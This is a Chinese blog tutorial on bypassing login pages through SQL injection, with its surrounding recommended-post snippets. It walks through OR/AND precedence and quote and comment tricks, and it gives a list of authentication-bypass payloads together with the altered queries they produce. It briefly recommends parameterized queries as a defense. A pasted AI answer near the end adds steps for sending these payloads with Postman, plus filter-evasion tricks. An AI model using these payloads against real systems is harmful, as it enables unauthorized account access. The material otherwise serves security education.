重点:SQL注入漏洞利用技巧:通过OR、AND、引号绕过身份验证,成功登录绕过登录页面

于 2025-04-21 14:00:09 发布
阅读量1k 收藏 18
点赞数 38
文章标签: sql web安全 网络安全 计算机 黑客技术 SQL注入 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxyxx12/article/details/147389448
版权

文章目录

说明

在SQL注入漏洞中,攻击者可以通过特定的SQL语句构造来绕过登录页面的身份验证逻辑。

攻击者可以利用 ORAND 语句、单引号(')和双引号(")等来改变查询逻辑,从而绕过密码验证,成功登录系统。以下是详细的说明:

身份验证绕过

正常语句解释

我们可以使用管理员凭据登录admin / p@ssw0rd

SELECT * FROM users WHERE username = 'input_username' AND password = 'input_password';
  • 该页面还显示正在执行的 SQL 查询,以便更好地了解我们如何颠覆查询逻辑。
  • 我们的目标是以管理员用户身份登录,而不使用现有密码。
  • 如我们所见,当前正在执行的 SQL 查询是:
代码:sql
SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd';
  • 该页面接收凭据,然后使用AND运算符选择与给定用户名和密码匹配的记录。
    • 如果MySQL数据库返回匹配的记录,则凭据有效,因此PHP代码会将登录尝试条件评估为true
    • 如果条件评估为true,则返回管理员记录,并且我们的登录得到验证。
    • 让我们看看当我们输入错误的凭据时会发生什么。

  • 正如预期的那样,由于密码错误导致登录失败,从而导致操作false产生结果AND
单引号注入
  • 注意:在某些情况下,我们可能必须使用有效负载的 URL 编码版本。例如,当我们将有效负载直接放在 URL 中时(即 HTTP GET 请求)。
  • 从注入单引号开始:

我们看到抛出的是 SQL 错误,而不是Login Failed消息。页面抛出错误是因为结果查询是:

SELECT * FROM logins WHERE username=''' AND password = 'something';

备注:

  • 我们输入的引号中引号的数量为奇数,从而导致语法错误。一种选择是注释掉查询的其余部分,并将查询的剩余部分作为注入的一部分写入以形成有效的查询。另一种选择是在我们注入的查询中使用偶数个引号,这样最终的查询仍然有效。
  • 我们需要查询始终返回true,无论输入的用户名和密码如何,以绕过身份验证。
    • 为此,我们可以OR在 SQL 注入中滥用运算符。
  • 如前所述,MySQL操作优先级文档指出,AND运算符将在运算符之前进行评估OR
    • 这意味着,如果整个查询中至少有一个TRUE条件以及OR运算符
    • 则整个查询将评估为,TRUE因为如果运算符的操作数之一是,则运算符OR将返回。TRUETRUE
  • 始终返回的条件示例true'1'='1'
    • 但是,为了保持 SQL 查询正常运行并保持偶数个引号
    • 我们将删除最后一个引号并使用 (‘1’=‘1’),而不是使用 (‘1’=‘1’)
    • 因此原始查询中剩余的单引号将代替它。
  • 因此,如果我们注入以下条件并OR在它和原始条件之间有一个运算符,它应该始终返回true
admin' or '1'='1

SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';
and or 语句介绍
  • 这意味着以下内容:
  • 如果用户名是admin
    OR
  • 如果1=1返回true“总是返回true
    AND
  • 如果密码是something

and or 运算符号
  • AND首先将评估运算符,然后返回。
  • false然后,OR将评估运算符,如果任一语句为true,则它将返回true
  • 由于1=1始终返回true,因此此查询将返回true,并且它将授予我们访问权限。

我给大家准备了一份全套的《网络安全入门+进阶学习资源包》包含各种常用工具和黑客技术电子书以及视频教程,需要的小伙伴可以扫描下方二维码或链接免费领取~

修改身份验证

注意:每个有效载荷都适用于特定类型的 SQL 查询,以下我说的的mysql语句载荷:

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

使用OR运算符绕过身份认证

让我们尝试将其作为用户名并查看响应。

我们能够以管理员身份成功登录。但是,如果我们不知道有效的用户名怎么办?这次让我们用不同的用户名尝试相同的请求。

由于表中不存在,登录失败notAdmin,并导致整体查询错误。

为了再次成功登录,我们需要进行全面true查询。这可以通过OR在密码字段中注入条件来实现,因此它将始终返回true。让我们尝试something' or '1'='1使用密码。

附加OR条件导致true查询总体而言,因为WHERE子句返回表中的所有内容,并且第一行中的用户已登录。在这种情况下,由于两个条件都将返回true,我们不必提供测试用户名和密码,而可以直接从'注入开始并使用登录' or '1' = '1

这是有效的,因为查询的评估与true用户名或密码无关。

利用SQL注入绕过登录

如果页面没有适当的输入验证,攻击者可以通过SQL注入来操控查询,改变其行为,从而绕过密码验证。

1. 利用 OR 语句

攻击者可以在用户名或密码字段中插入 OR 语句,这样即使密码不正确,也可以使查询返回结果。例如:

  • 在用户名输入框中输入:' OR '1' = '1
  • 在密码输入框中输入:' OR '1' = '1

这样,SQL查询会变成:

SELECT * FROM users WHERE username = '' OR '1' = '1' AND password = '' OR '1' = '1';

由于 OR '1' = '1' 始终为真,查询会返回第一个用户的记录,绕过用户名和密码验证,直接登录。

2. 利用 AND 语句

攻击者还可以使用 AND 来制造一个始终为真的条件,使得查询成功。例如:

  • 在用户名输入框中输入:' AND 1=1
  • 在密码输入框中输入:' AND 1=1

这个SQL查询变成:

SELECT * FROM users WHERE username = '' AND 1=1 AND password = '' AND 1=1;

这里 AND 1=1 始终为真,攻击者可以通过这种方式绕过验证。

3. 使用单引号(')和双引号("

单引号和双引号通常用于定义SQL查询中的字符串常量。如果输入没有适当过滤,攻击者可以使用单引号或双引号来关闭SQL字符串并注入自己的SQL代码。

  • 在用户名或密码输入框中输入:' OR 1=1 --

这将导致查询变成:

SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = '';

在这里,-- 是SQL的注释符号,注释掉了查询的其余部分。因此,整个查询的条件就变成了 OR 1=1,始终为真,从而绕过了验证。

4. 使用双引号绕过(在某些数据库中)

一些数据库允许使用双引号来包围字符串,因此攻击者可以通过双引号来构造SQL注入:

  • 在用户名或密码输入框中输入:" OR 1=1 --

这会改变查询为:

SELECT * FROM users WHERE username = "" OR 1=1 --" AND password = "";

同样,由于 OR 1=1 永远为真,攻击者可以绕过身份验证。

总结

SQL注入攻击通常依赖于输入验证不足或缺失,攻击者可以通过使用 ORAND、单引号、双引号等技巧来构造恶意的SQL查询,绕过身份验证。为了防止这类攻击,开发者应采取如下措施:

  • 使用参数化查询(Prepared Statements)或存储过程来避免将用户输入直接拼接到SQL查询中。
  • 对用户输入进行严格验证,过滤非法字符(如单引号、双引号等)。
  • 实现最小权限原则,限制数据库查询的权限。

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

👉1.成长路线图&学习规划👈

要学习一门新的技术,作为新手一定要先学习成长路线图,方向不对,努力白费

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图&学习规划。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

在这里插入图片描述
在这里插入图片描述

👉2.网安入门到进阶视频教程👈

很多朋友都不喜欢晦涩的文字,我也为大家准备了视频教程,其中一共有21个章节,每个章节都是当前板块的精华浓缩。(全套教程扫描领取哈)
在这里插入图片描述
在这里插入图片描述

👉3.SRC&黑客文档👈

大家最喜欢也是最关心的SRC技术文籍&黑客技术也有收录

SRC技术文籍:
在这里插入图片描述
黑客资料由于是敏感资源,这里不能直接展示哦! (全套教程扫描领取哈)

👉4.护网行动资料👈

其中关于HW护网行动,也准备了对应的资料,这些内容可相当于比赛的金手指!
在这里插入图片描述

👉5.黑客必读书单👈

在这里插入图片描述

👉6.网络安全岗面试题合集👈

当你自学到这里,你就要开始思考找工作的事情了,而工作绕不开的就是真题和面试题。
在这里插入图片描述

所有资料共282G,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

23-3 绕过过滤 andorSQL注入
weixin_43263566的博客
02-03 524
在深入了解SQL注入等数据库安全话题之前,掌握一些MySQL数据库的基础知识是很重要的。
SQL注入漏洞复现:探索不同类型的注入攻击方法
weixin_43263566的博客
08-26 1883
基于错误的注入(Error-based Injection):攻击者通过构造恶意的SQL语句,利用应用程序返回的错误信息来获取数据库中的敏感信息。基于联合查询的注入(Union-based Injection):攻击者通过在注入点处构造特殊的SQL语句,利用UNION命令将其他查询结果合并到原始查询中,从而获取额外的数据。基于时间延迟的注入(Time-based Injection):攻击者通过在注入点处构造特殊的SQL语句,
4、 AND & OR 运算符
未名胡的博客
08-04 1059
and & or 运算符用于基于一个以上的条件对记录进行过滤。 and & or 运算符 如果第一个条件和第二个条件都成立,则 AND 运算符显示一条记录。 如果第一个条件和第二个条件中只要有一个成立,则 OR 运算符显示一条记录。 演示数据库 在本教程中,我们将使用 RUNOOB 样本数据库。 下面是选自 "Websites" 表的数据: +----+-----------
SQL注入---字符绕过
zhoutong2323的博客
04-10 2970
当网页源代码中出现如下代码后,常见的注释符号将无效,因此需要通过特殊手段进行绕过 上述代码中无法使用符号(#)或(--+)将后面的sql语句注释,因此需要通过特殊手段将后面多出的单引号闭合演示案例: 二.andor 过滤绕过 过滤源代码 绕过手法 三.空格过滤绕过 过滤代码: 绕过手法: 在不同的环境中能够绕过的URL编码有所不同,因此需要多次尝试。演示案例:未使用URL编码注入前:符号被过滤 使用URL注入编码后 报错注入
SQL AND & OR
csbysj2020的博客
02-19 882
ANDORANDOR运算符是SQL查询中的基本元素,它们可以帮助我们构建复杂的查询语句。在实际应用中,合理使用这两个运算符可以提高查询效率,使我们的数据库操作更加灵活。希望本文能帮助您更好地理解ANDOR运算符的用法。
绕过剔除andorSQL注入
一米八多的瑞兹的博客
03-07 1017
绕过剔除andorSQL注入 1. 基础知识介绍 1、Mysql中的大小写不敏感,大写与小写一样。 2、Mysql 中的十六进制与URL编码。 3、符号和关键字替换 and – &&、or – ||。 4、内联注释与多行注释 /! 内联注释/ /多行注释/。 2. 去除andor的代码分析 preg_replace(mixed $pattern , mixed $replacement , mixed $subject):执行一个正则表达式的搜索和替换。 $pattern:
SQL指令— AND OR
08-03 669
SQL指令— AND OR 在上一页中,我们看到 WHERE 指令可以被用来由表格中 有条件地选取资料。 这个条件可能是简单的 (像上一页的例子),也可能是复杂的。复杂条件是由二或多个简单条件透过 AND 或是 OR 的连接而成。一个 SQL 语句中可以有无限多个简单条件的存在。
自己动手编写SQL注入漏洞扫描工具
03-25
SQL注入是一种常见的网络安全威胁,...通过分析和调试给定的代码,我们可以学习到如何识别和利用SQL注入漏洞,同时也能提高对Web安全的认识。但请记住,任何安全工具的使用都应以教育和防御为目的,不得用于非法活动。
sql注入漏洞和实验
2303_81447649的博客
02-29 1608
发现不管输入什么都不管用了这个时候布尔盲注就不适合我们了,布尔盲注对于页面的正确和错误有不同的回显,如果页面一直没有变化我们就可以用时间盲注其实时间盲注和布尔盲注没有多大的差别,时间盲注多了if和sleep()函数。在将数据存入到了数据库中之后,开发者就认为数据是可信的,在下一次需要进行查询的时候,直接从数据库中取出了恶意数据,没有进行进一步的检验和处理,就会造成二次注入SQL注入攻击的本质,服务器没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全
SQL注入天书-ASP注入漏洞全接触.pdf
07-09
例如,一个简单的注入尝试可能是将URL中的`id`参数改为`id=49' or '1'='1`,这可能导致查询的条件始终为真,让攻击者绕过身份验证。 在进一步的章节中,作者可能会详细介绍如何根据不同的数据库类型和查询结构构造...
SQL 注入漏洞原理以及修复方法
web14786210723的博客
01-21 761
具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。注:把magic_quotes_gpc选项打开,在这种情况下所有的客户端GET和POST的数据都会自动进行addslashes处理,所以此时对字符串值的SQL注入是不可行的,但要防止对数字值的SQL注入,如用intval()等函数进行处理。使用参数化SQL语句,同时也能提高查询的效率。
SQL注入实战:绕过操作
ting_liang的博客
01-27 3283
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络中的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,OrORoRAndANdaND等-代码中大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
SQL中的andor
To_be_Designer
08-10 3489
SQL语言中的andor与平时我们所说的“与”和“或”在语义上没什么区别,但是在用法上还是有区别的。and  含义:”与”, 两个都为真则为真, 一个为假则为假。   and 用在where子句中,用来指示检索满足所有给定条件的行。or  含义:”或”, 两个都为假则为假, 一个为真则为真。   or用在where子句中,用来指示检索匹配任一给定条件的行。  orandSQL语法中并不是像
SQL注入 绕过andor过滤
阿坤的博客
12-10 2984
SQL注入 绕过andor过滤 1.基础知识介绍 1.MySQL中的大小写不敏感,大写与小写一样。 2.MySQL中的十六进制与URL编码 3.符号和关键字替换and – &&、or–|| 4.内联注释与多行注释 /*! 内联注释*/ 1 ...
SQL中的andor
热门推荐
孤的博客
07-17 1万+
sql查询语句中长用到andor,它们在用的时候有些需要注意的地方 不管在一项表达式中有多少个andor,它是将前一个表达式看作一项,andor后的所有表达式看做一项。 and的前后都为真的时候才为真,取交集 or有一个为真,即为真,取并集 select * from users where 1=1; # 1=1 即全集 select * from users where id...
Web渗透(二)——SQL注入绕过
qq_61562251的博客
12-14 1174
在mysql查询可以使用distinct关键词去除查询的重复值,可以利用这点突破waf拦截。在mysql可以使用这里是反引号绕过一些waf拦截,字段可以加反引号或者不加,意义相同。针对后端语言对sql语句注入的过滤,所进行的绕过方法。11、PCRE绕过(运行大量字符)反引号前面不加空格也是可以的。1、关键字内联注释尝试绕所有。10、花括号{}绕过
登录SQL注入
dcujcivw769565的博客
09-02 197
登录页面的账号密码的输入框中分别输入,这个值:1' or '1'='1 一,验证的数据库语句,讲传人的值组合成数据库语句: public DataTable CheckLogin(string name, string pwd) { string strSqlCom = "select *from UserIn...
sql中的 orand
玩垃圾的人
07-22 7556
前言     在以前的项目中,都没有使用过or,这次用到了,就花时间来整理下. 使用     这里首先要说明的是优先级的问题,     or的优先级是倒一,     and的优先级是倒二. 例子1 SELECT * FROM USER WHERE 1=1 OR ID='1';     这里1=1查出的是所有的数据,id=1,包含在1=1中.所以这里查出的是所有数据. 例子2 ...
sql注入绕过登录postman
最新发布
03-15
<think>好的,我现在需要学习如何通过SQL注入绕过登录验证,特别是使用Postman进行测试。首先,我得了解SQL注入的基本原理。SQL注入通常发生在应用程序未正确过滤用户输入的情况下,攻击者可以通过输入恶意SQL代码来操纵数据库查询。 用户提到想绕过登录验证,这意味着他们可能想利用登录表单中的漏洞,比如用户名或密码字段,来绕过身份验证。常见的绕过方法是在用户名输入中注入永真条件,例如' OR '1'='1,这样查询可能返回有效用户,从而允许未授权访问。 接下来,我需要考虑如何使用Postman进行这种测试。Postman是一个API测试工具,可以用来发送HTTP请求。假设登录请求是通过POST方法提交的,参数可能以表单数据或JSON格式发送。我需要构造一个包含SQL注入代码的请求体,然后发送到登录接口。 但必须注意,这种测试只能在合法授权的环境下进行,未经授权的测试是非法的。用户应该确保他们有权测试目标系统,以免触犯法律。 现在,我需要验证步骤是否正确。首先,确定登录请求的类型(POST/GET),参数名(如username和password)。然后,在Postman中设置请求方法、URL、Headers(如Content-Type),并在Body中填入注入代码。例如,在username字段输入admin' --,这样注释掉后面的密码检查,可能直接以admin身份登录。 同时,要关注服务器的响应,查看是否登录成功,或者是否有错误信息泄露,这有助于进一步优化注入语句。另外,可能需要尝试不同的注入方式,如联合查询或基于时间的盲注,但绕过登录通常使用简单的永真条件即可。 还要考虑目标系统是否使用了预处理语句或ORM,这些措施能有效防止SQL注入。如果存在这些防护,注入可能不会成功。因此,测试前了解目标系统的防护机制也很重要。 最后,用户可能需要了解如何防范此类攻击,比如使用参数化查询、输入验证和过滤,以及最小化数据库权限。这些措施能提升系统的安全性,防止未授权访问。</think>### 通过SQL注入绕过登录验证(使用Postman) #### 1. **原理分析** SQL注入绕过登录的核心是通过构造恶意输入,使SQL查询条件恒成立。例如,登录查询语句可能是: $$ SELECT * FROM users WHERE username='[输入的用户名]' AND password='[输入的密码]' $$ 若在用户名输入 `admin' -- `,查询会变为: $$ SELECT * FROM users WHERE username='admin' -- ' AND password='任意值' $$ `--` 是SQL注释符,后续条件被忽略,若存在用户 `admin`,则绕过密码验证[^3]。 #### 2. **使用Postman测试步骤** **步骤1:确定登录请求参数** - 请求方法:通常是 `POST` - 请求URL:如 `http://example.com/login` - 参数格式:常见为 `x-www-form-urlencoded` 或 `JSON`(需观察请求头 `Content-Type`) **步骤2:构造注入Payload** - **示例1(基础绕过)**: ```json { "username": "admin' -- ", "password": "任意值" } ``` - **示例2(永真条件)**: ```json { "username": "' OR 1=1 -- ", "password": "空" } ``` **步骤3:发送请求并观察响应** - 成功时:返回登录成功标识(如302重定向、Token或用户信息)[^2]。 - 失败时:检查错误信息(如数据库类型、过滤规则),调整Payload。 #### 3. **注意事项** - **合法授权**:仅在拥有测试权限的系统上进行,避免触犯法律。 - **防护措施**: - 使用参数化查询(非字符串拼接)。 - 对输入进行严格过滤(如禁用特殊字符 `'`, `--`)。 - 启用Web应用防火墙(WAF)[^1]。 #### 4. **高级绕过技巧** - **绕过空格过滤**:用`/**/`代替空格,如 `'OR/**/1=1--`。 - **闭合引号**:若语句被引号包裹,需闭合引号,如 `' OR '1'='1' -- `。 - **联合查询**:通过 `UNION SELECT` 直接伪造用户数据(需知表结构)。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值